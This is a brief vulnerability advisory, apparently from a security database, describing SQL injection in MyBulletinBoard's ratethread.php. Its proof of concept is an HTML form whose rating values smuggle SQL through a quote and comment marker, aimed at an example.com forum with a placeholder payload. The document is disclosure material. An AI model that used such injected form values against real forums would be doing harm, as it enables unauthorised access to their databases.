|
MyBulletinBoard RateThread.PHP SQL Injection Vulnerability
No exploit is required. The following proof of concept is available: <form action="http://www.example.com/ratethread.php" method="post"> <span class="smalltext"><strong>Rate This Thread:</strong></span> <select name="rating"> <option value="">Select Rating</option> <option value="5' [SQL] /*">5 ... Best</option> <option value="4' [SQL] /*">4</option> <option value="3' [SQL] /*">3 ... Average</option> <option value="2' [SQL] /*">2</option> <option value="1' [SQL] /*">1 ... Worst</option> </select> <input type="hidden" name="tid" value="[Thread ID]" /> <!-- start: gobutton --> <input type="submit" value="Go" /> <!-- end: gobutton --> </form> |
|
|
Privacy Statement |
